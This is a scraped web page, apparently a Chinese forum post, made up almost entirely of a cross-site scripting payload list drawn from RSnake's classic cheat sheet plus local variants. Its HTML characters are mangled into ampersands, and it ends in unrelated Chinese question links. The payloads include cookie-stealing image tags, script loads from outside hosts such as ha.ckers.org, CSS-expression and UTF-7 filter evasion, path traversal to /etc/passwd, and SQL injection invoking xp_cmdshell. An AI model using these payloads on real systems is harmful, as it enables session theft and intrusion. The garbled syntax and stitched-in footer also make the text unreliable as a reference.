& & & & & & & & & & &EC_tep.title+EC_tap.title+
& & & & & & & & & & &'script src=http://localhost/1.js'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'/script'+
& & & & & & & & & & &EC_tep.title)
& & & & & & & & & & &:1=1);
& & & & & & & & &}
& & & & &&/style&
&img src=&java script:alert(/xss-49/)& width=0&&
&img src=&#& onerror=alert(/xss-50/) width=0&&
&a href=&replace.htm#state=0&url=/&script&alert('xeye')&/script&&&xeye&/a&
&link type=&text/css& rel=&stylesheet& href=& & /&
&body{background: url(javascript:alert(document.cookie); ) }&/body&
&script/hello&alert(/xss-51/)&/script/world&
&img/ssssss/src=&javascript:alert(/1/)&&
&IMG SRC=`javascript:alert(/2/)`&
&IMG/src/SRC=`SRC//=//javascript:alert(/2/)`&
&IMG/src=javascript:alert(/2/)`/SRC=`;SRC=javascript:alert(/2/)&
&style&body{xss:expression(alert(/xss-52/))}&/style&
&style&@import 'javascript:alert(/xss-53/)'; &/style&
&script&alert(&XSS-54&)&/script&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-55&)';&/STYLE&
&style&@\im\port'\ja\vasc\ript:alert()';&/style&
&style&@\im\po\rt'\0ja\0va\0sc\0ri\0pt:alert()';&/style&
&STYLE&@\0im\port'\0ja\vasc\ript:alert(&XSS-56&)';&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS-57')&)}&/STYLE&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS-58')&);}&/STYLE&&A CLASS=XSS&&/A&&
&marquee onstart=&alert(/2/)&&.&/marquee&
&div style=&xss:ex/**/pre/**/ssion(alert('xss-59'))&&
&div style=&xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))&&
&DIV STYLE=&width: expression(alert('XSS-60'));&&
&div style=&background:url('javascript:alert(1)')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS-61'))&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('javascript:eval(document.all.mycode.expr)')&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('java\script:eval(document.all.mycode.expr)')&&&
&BODY BACKGROUND=&javascript:alert('XSS-62')&&
&BODY ONLOAD=alert('XSS-63')&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS-64');&&
&FRAMESET&&FRAME src=javascript:alert('XSS-65')&&/FRAME&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS-66')&&
&iframe src=&vbscript:alert()&&
&IFRAME src=javascript:alert('XSS-67')&&/IFRAME&
&IMG STYLE='xss:expre\ssion(alert(&XSS-68&))'&
&img src=&#& style=&Xss:expression(alert('xss-69'));&&
&IMG src='vbscript:msgbox(&XSS-70&)'&
&IMG DYNsrc=&javascript:alert('XSS-71')&&&
&IMG LOWsrc=&javascript:alert('XSS-72')&&
&img src=&javascript:alert('3');&&
&img src=/892.jpg& onerror=alert('4')&
&img src=&javascript:alert('XSS');&&
&IMG src=		)&
&img src=&javascript:alert('XSS');&& =&img src=&javascript:alert('5');&&
&img STYLE=&background-image: url(javascript:alert('6'))&&
javascript:document.write(&&script src=/1.js&&/script&&)&
&img src=&javascript:alert(/10/)&&
&img src=&#& onerror=alert(/11/) &
&IMG SRC=&JAVA&115;CRIPT:ALERT('12');&&&/IMG&
&img src=&javascript:alert('XSS-73')&&
&IMG src=&jav	ascript:alert('XSS-74');&&&
&IMG src=&jav
ascript:alert('XSS-75');&&&
&IMG src=&jav
ascript:alert('XSS-76');&&&
javascript:document.write('&scri'+'pt src=/1.txt&'+'&/scri'+'pt&');
RSnake的经典XSS脚本都测试下
[float=expression(alert('xss-77'))]11[/float]
&TABLE BACKGROUND=javscript:alert(/xss-78/)&
163的跨站 &img src=&jav as cript:alert('XSS-79');&&
126 &img src=&javascript:alert('XSS');&&
&img src=&javascript:window.open('/msg.asp?msg='+document cookie);&&
xss.jpg& onerror=window.open('/msg.asp?msg='+'document cookie) width=0&
&img src=&blah&onmouseover=alert()&
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-80&)';&/STYLE&&
七种tab符	、换行符
、回车符
&img src=&abc&& onmouseover=&[code]&&
&SCRIPT a=&&& SRC=&xss.js&&&/SCRIPT&
&script&/*
*/(&zs&)/*
*/&/script&
&table&&tr&&td background=&javascript:alert(/xss-81/)&&&/tr&&/table&
http://xss.jpg" onerror=alert('4')>
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))';&/STYLE&&
&style&@import url(http://xxx.xxx.xxx/xss.css); &/style&
xss:expression(
if(!window.x)//防止重复执行
{alert('xss-82');
window.x=1;
&style & type= &text/css & & media= &all & & title= &Default &&&
.mycss & {&
wuxinlangman:expression(onmousemove=function(){&
this.style.color= &blue &;&
},onmouseout=function(){&
this.style.color= &red &;&
& & &/style&&
& & &body & id= &wuxinlangman &&&
&input & class= &mycss & & value= &wuxinlangman &/&&
&style type=&text/css&&
a {star : expression_r(onfocus=this.blur)}
&a href=&link1.htm&&link1&/a&
&a href=&link2.htm&&link2&/a&
&a href=&link3.htm&&link3&/a&
&style&body{xss:expr/*/*/expression/expression*/ession(alert(/xss-83/))}&/style&
&STYLE&body{xss:exprexpression/expression*/ession(alert(/xss-84/))}&/STYLE&
&style&body{xss:expr/*/*//*/ession(alert(/xss-85/))}&/style&
&STYLE&body{xss:expr/*/ession(alert(/xss-86/))}&/STYLE&
&style&body{xss:expr/*/*/ession(alert(/xss-87/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-88/))}&/STYLE&
&style&body{xss:expr/*//*/ession(alert(/xss-89/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-90/))}&/STYLE&
&style&body{xss:expr/*///*////*/ession(alert(/xss-91/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-92/))}&/STYLE&
&style&body{xss:expr/*///**////*/ession(alert(/xss-93/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-94/))}&/STYLE&
&style&body{xss:expr/*///******////*/ession(alert(/xss-95/))}&/style&
'&&script&alert(document.cookie)&/script&&
='&&script&alert(document.cookie)&/script&&
&script&alert(document.cookie)&/script&&
&script&alert(vulnerable)&/script&&
%3Cscript%3Ealert('XSS-96')%3C/script%3E&
&script&alert('XSS-97')&/script&&
&img src=&javascript:alert('XSS-98')&&&
%0a%0a&script&alert(\&Vulnerable\&)&/script&.&
%22%3cscript%3ealert(%22xss%22)%3c/script%3e&
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini&
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html&
&script&alert('Vulnerable');&/script>&
&script&alert('Vulnerable')&/script&&
?sql_debug=1&
a%5c.aspx&
a.jsp/&script&alert('Vulnerable')&/script&&
a?&script&alert('Vulnerable')&/script&&
&&&script&alert('Vulnerable')&/script&&
';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&
%3Cscript%3Ealert(document. domain);%3C/script%3E&&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=&
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=&
../../../../../../../../etc/passwd&
..\..\..\..\..\..\..\..\windows\system.ini&
\..\..\..\..\..\..\..\..\windows\system.ini&
'';!--&&XSS&=&{()}&
&IMG SRC=&javascript:alert('XSS-99');&&&
&IMG SRC=javascript:alert('XSS-100')&&
&IMG SRC=JaVaScRiPt:alert('XSS-101')&&
&IMG SRC=JaVaScRiPt:alert(&XSS&)&&
&IMG SRC=javascript:alert('XSS')&&
&IMG SRC=		)&&
&IMG SRC=javascript:alert('XSS')&&
&IMG SRC=&jav	ascript:alert('XSS-102');&&&
&IMG SRC=&jav
ascript:alert('XSS-103');&&&
&IMG SRC=&jav
ascript:alert('XSS');&&&
&&IMG SRC=java\0script:alert(\&XSS\&)&&;' & out&
&IMG SRC=& javascript:alert('XSS');&&&
&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&&
&BODY BACKGROUND=&javascript:alert('XSS')&&&
&BODY ONLOAD=alert('XSS')&&
&IMG DYNSRC=&javascript:alert('XSS')&&&
&IMG LOWSRC=&javascript:alert('XSS')&&&
&BGSOUND SRC=&javascript:alert('XSS');&&&
&br size=&&{alert('XSS')}&&&
&LAYER SRC=&http://www.nspcn.org/xss/a.js&&&/layer&&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&&
&IMG SRC='vbscript:msgbox(&XSS&)'&&
&IMG SRC=&mocha:[code]&&&
&IMG SRC=&livescript:[code]&&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&&
&IFRAME SRC=javascript:alert('XSS')&&/IFRAME&&
&FRAMESET&&FRAME SRC=javascript:alert('XSS')&&/FRAME&&/FRAMESET&&
&TABLE BACKGROUND=&javascript:alert('XSS')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&&
&DIV STYLE=&behaviour: url('http://www.how-to-hack.org/exploit.html');&&&
&DIV STYLE=&width: expression(alert('XSS'));&&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&&
&IMG STYLE='xss:expre\ssion(alert(&XSS&))'&&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&&
&BASE HREF=&javascript:alert('XSS');//&&&
getURL(&javascript:alert('XSS')&)&
a=&get&;b=&URL&;c=&javascript:&;d=&alert('XSS');&;eval(a+b+c+d);&
&XML SRC=&javascript:alert('XSS');&&&
&& &BODY ONLOAD=&a();&&&SCRIPT&function a(){alert('XSS');}&/SCRIPT&&&&
&SCRIPT SRC=/384.jpg&&&/SCRIPT&&
&IMG SRC=&javascript:alert('XSS')&&
&!--#exec cmd=&/bin/echo '&SCRIPT SRC'&--&&!--#exec cmd=&/bin/echo '=http://www.nspcn.org/xss/a.js&&/SCRIPT&'&--&&
&SCRIPT a=&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT =&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT a=&&& '' SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT &a='&'& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&A HREF=http://www.go//&link&/A&&
&!--[if true]&&img onerror=alert(1) src=--&
&form action=javascript:alert(1)&&input type=submit&
&input autofocus onfocus=alert(1)&
&select autofocus onfocus=alert(1)&
&textarea autofocus onfocus=alert(1)&
&keygen autofocus onfocus=alert(1)&
&img src=1 language=vbs onerror=msgbox+1&
&img src=1 language=vbscript onerror=msgbox+1&
&img src=1 onerror=vbs:msgbox+1&
&b/alt=&1&onmouseover=InputBox+1 language=vbs&test&/b&
&iframe onreadystatechange=alert(1)&
&style onreadystatechange=alert(1)&
&script onreadystatechange=alert(1)&&/script&
&iframe onreadystatechange=alert(1)&&/iframe&
&style onreadystatechange=alert(1)&&/style&
&xml onreadystatechange=alert(1)&
&xml onreadystatechange=alert(1)&test&/xml&
&object type=image src=/565.gif onreadystatechange=alert(1)&&/object&
&img type=image src=/565.gif onreadystatechange=alert(1)&
&image type=image src=/565.gif onreadystatechange=alert(1)&
&input type=image src=/565.gif onreadystatechange=alert(1)&
&isindex type=image src=/565.gif onreadystatechange=alert(1)&
&object data=anything_at_all.pdf&¶m name=src value=&http://p42.us/xss.pdf&&&/param&&/object&
&img src=&x onerror=alert(1)//[^&]* &&
&a href='data:text/xml,&?xml version=&1.0& encoding=&UTF-8&?&&!DOCTYPE html [ &!ENTITY inject &<script>alert(1)</script>&&]&&html xmlns=&http://www.w3.org/1999/xhtml&&&&/html&'&haha&/a&
This used to work on FF &=3.0&
@import 'data:text/css,* { -moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss) }';
expressions I could go on all night :)
&div style=&xss:exp\00ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73:\70\73\6f\006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\ \0073: \ \ \ \ \006f \006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xss:\078\\\\e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xs\0s:e\x\pression\(window.x?0:(alert(/XSS/),window.x=1)\);&&&/div&
&div style=&\73:\;\;\;\;\;\;\;\;\006fe(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73>:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\8\3s:e\xp/*tbeorhf*/ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
Encoded comments:-
&div style=&xss:ex/*OMG*/pression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
The VB example doesn't require () :-
&IMG SRC=a onerror='vbscript:msgbox&XSS&'&
And how about vbs:&
&img src=1 onerror=&vbs:MsgBox 1&&
&?xml version=&1.0& encoding=&utf-7&?&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&
&ſcript&
&SCRIPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&
&IMG SRC=&javascript:alert('XSS');&&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=JaVaScRiPt:alert('XSS')&
&IMG SRC=javascript:alert(&XSS&)&
&IMG SRC=`javascript:alert(&RSnake says, 'XSS'&)`&
&IMG &&&&&SCRIPT&alert(&XSS&)&/SCRIPT&&&
&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=		)&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=&jav ascript:alert('XSS');&&
&IMG SRC=&jav	ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&  &javascript:alert('XSS');&&
&SCRIPT/XSS SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(&XSS&)&
&SCRIPT/SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS&);//&&/SCRIPT&
&SCRIPT SRC=http://ha.ckers.org/xss.js?&B&
&SCRIPT SRC=//ha.ckers.org/.j&
&IMG SRC=&javascript:alert('XSS')&
&iframe src=http://ha.ckers.org/scriptlet.html &
&SCRIPT&a=/XSS/
alert(a.source)&/SCRIPT&
\&;alert('XSS');//
&/TITLE&&SCRIPT&alert(&XSS&);&/SCRIPT&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS');&&
&BODY BACKGROUND=&javascript:alert('XSS')&&
&BODY ONLOAD=alert('XSS')&
&IMG DYNSRC=&javascript:alert('XSS')&&
&IMG LOWSRC=&javascript:alert('XSS')&&
&BGSOUND SRC=&javascript:alert('XSS');&&
&BR SIZE=&&{alert('XSS')}&&
&LAYER SRC=&http://ha.ckers.org/scriptlet.html&&&/LAYER&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&
&LINK REL=&stylesheet& HREF=&http://ha.ckers.org/xss.css&&
&STYLE&@import'http://ha.ckers.org/xss.css';&/STYLE&
&META HTTP-EQUIV=&Link& Content=&&http://ha.ckers.org/xss.css&; REL=stylesheet&&
&STYLE&BODY{-moz-binding:url(&http://ha.ckers.org/xssmoz.xml#xss&)}&/STYLE&
&XSS STYLE=&behavior: url(xss.htc);&&
&STYLE&li {list-style-image: url(&javascript:alert('XSS')&);}&/STYLE&&UL&&LI&XSS
&IMG SRC='vbscript:msgbox(&XSS&)'&
&IMG SRC=&mocha:[code]&&
&IMG SRC=&livescript:[code]&&
?script?alert(¢XSS¢)?/script?
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&&
&META HTTP-EQUIV=&refresh& CONTENT=&0; URL=http://;URL=javascript:alert('XSS');&&
&IFRAME SRC=&javascript:alert('XSS');&&&/IFRAME&
&FRAMESET&&FRAME SRC=&javascript:alert('XSS');&&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS')&&
&TABLE&&TD BACKGROUND=&javascript:alert('XSS')&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&background-image:\6C\6a\61\72\74\003a\65\28.53\29'\0029&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&width: expression(alert('XSS'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&
&IMG STYLE=&xss:expr/*XSS*/ession(alert('XSS'))&&
&XSS STYLE=&xss:expression(alert('XSS'))&&
exp/*&A STYLE='no\xss:noxss(&*//*&);
xss:ex/*XSS*//*/*/pression(alert(&XSS&))'&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&
&STYLE&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&
&!--[if gte IE 4]&
&SCRIPT&alert('XSS');&/SCRIPT&
&![endif]--&
&BASE HREF=&javascript:alert('XSS');//&&
&OBJECT TYPE=&text/x-scriptlet& DATA=&http://ha.ckers.org/scriptlet.html&&&/OBJECT&
&OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&¶m name=url value=javascript:alert('XSS')&&/OBJECT&
----------------------------------------------------------------------------------------------
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
&EMBED SRC=&data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDA3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==& type=&image/svg+xml& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
b=&URL(\&&;
c=&javascript:&;
d=&alert('XSS');\&)&;
eval(a+b+c+d);
----------------------------------------------------------------------------------------------
&HTML xmlns:xss&
& &?import namespace=&xss& implementation=&http://ha.ckers.org/xss.htc&&
& &xss:xss&XSS&/xss:xss&
&XML ID=I&&X&&C&&![CDATA[&IMG SRC=&javas]]&&![CDATA[cript:alert('XSS');&&]]&
&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
&XML ID=&xss&&&I&&B&&IMG SRC=&javas&!-- --&cript:alert('XSS')&&&/B&&/I&&/XML&
&SPAN DATASRC=&#xss& DATAFLD=&B& DATAFORMATAS=&HTML&&&/SPAN&
&XML SRC=&xsstest.xml& ID=I&&/XML&
&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
----------------------------------------------------------------------------------------------
&HTML&&BODY&
&?xml:namespace prefix=&t& ns=&urn:schemas-microsoft-com:time&&
&?import namespace=&t& implementation=&#default#time2&&
&t:set attributeName=&innerHTML& to=&XSS&SCRIPT DEFER&alert(&XSS&)&/SCRIPT&&&
&/BODY&&/HTML&
----------------------------------------------------------------------------------------------
&SCRIPT SRC=/420.jpg&&&/SCRIPT&
&!--#exec cmd=&/bin/echo '&SCR'&--&&!--#exec cmd=&/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&'&--&
&? echo('&SCR)';
echo('IPT&alert(&XSS&)&/SCRIPT&'); ?&
&IMG SRC=&/somecommand.php?somevariables=maliciouscode&&
Redirect 302 /a.jpg /admin.asp&deleteuser
&META HTTP-EQUIV=&Set-Cookie& Content=&USERID=&SCRIPT&alert('XSS')&/SCRIPT&&&
&HEAD&&META HTTP-EQUIV=&CONTENT-TYPE& CONTENT=&text/ charset=UTF-7&& &/HEAD&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
----------------------------------------------------------------------------------------------
&SCRIPT a=&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT =&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&& '' SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT &a='&'& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=`&` SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&'&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
----------------------------------------------------------------------------------------------
&A HREF=&http://66.102.7.147/&&XSS&/A&
&A HREF=&http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&&XSS&/A&
&A HREF=&http:///&&XSS&/A&
&A HREF=&http://0x42.0xx7.0x93/&&XSS&/A&
&A HREF=&http://07./&&XSS&/A&
&A HREF=&h
tt p://6	6.x7.147/&&XSS&/A&
&A HREF=&///&&XSS&/A&
&A HREF=&//google&&XSS&/A&
&A HREF=&http://ha.ckers.org@google&&XSS&/A&
&A HREF=&http://google:ha.ckers.org&&XSS&/A&
&A HREF=&/&&XSS&/A&
&A HREF=&./&&XSS&/A&
&A HREF=&javascript:document.location='/'&&XSS&/A&
&A HREF=&http://www.go//&&XSS&/A&}
我要回帖
更多关于 英国tlc中文网 靠谱吗 的文章
更多推荐
- ·英语四级成绩要纸质还是电子纸质成绩报告单取消了吗?
- ·英语四级准考证打印入口成绩单取消了吗?
- ·惠州市榕城惠州市商贸职业技术学校校的校园设施如何?能否简单介绍一下?
- ·深圳市宝山深圳技工学校哪家好是如何促进与深圳现代产业的对接的?
- ·新加坡有培训机构吗教育发展联合会是做什么的?
- ·王者荣耀梦泪韩信出装超玩会梦泪韩信教学,怎样操作出王者史上最长
- ·老哥们,15.6寸的轻薄笔记本怎么选本,选哪个好
- ·求矩阵的逆矩阵计算.我怎么算到了但是总
- ·怎么理解通过国家统一国家司法考试试并取得A,B
- ·特约沈阳北新扣款平安银行股份有限公司扣款900,邮政银行,什么情况啊,
- ·大家还记得这样的小学老师招聘吗
- ·该不该去奶牛养殖场石家庄待遇不错的国企好,单位不错,求建议
- ·曲字鼎用部首查字法应查查什么部
- ·闭经吃逍遥丸丸和葡萄籽还有维C可以一试吃吗
- ·好利来甜霜怎么吃草莓甜霜好吃吗
- ·范瑞冰张的连笔字怎么写写
- ·大学在读,同班同学生病住院募捐箱,捐多少合适
- ·石岩哪里有UG模具设计培训多少钱学校
- ·发生了前列腺癌骨转移化疗,化疗几次后可以做手术吗
- ·16岁女孩能做武汉协和腋臭手术费用吗.费用多少.需要几天出院
- ·appen中文录取appen靠谱吗吗
- ·受不了,在没有药的情况下,怎么样才能药流做才能缓解疼痛
- ·点剧痛,拉出来立刻不痛,肚子剧痛怎么回事事
- ·现在社会人的人心死 道心活 道德经变坏,道德经怎么没起到作
- ·药物反应引起的低烧,白血球低会引起脱发吗高吗
- ·QQ兄弟说说大全怎么看自己兄
- ·右脚踝距骨脚踝骨髓水肿肿是什么情况
- ·胳膊手腕骨折需要手术吗才做手术十一天用石膏固定着什么时候手可以
- ·我是广大附中大学城校区大三的,有一起摄影的小伙伴吗
- ·如何制定企业发展战略招聘战略,为企业快速找到正确的人
- ·谁敢说看明白了这集大篇幅 英文的数学推理
- ·怎样不开刀变双眼皮双眼皮金华多少钱?
- ·看性病吉林快大概多少
- ·吉林看梅毒终身携带收费哪合理?最好带地址。
- ·重庆微创双眼皮手术正规的是哪??
- ·外阴瘙痒很多小疙瘩起了一个黄豆大的小疙瘩,一按会痛,是什么病
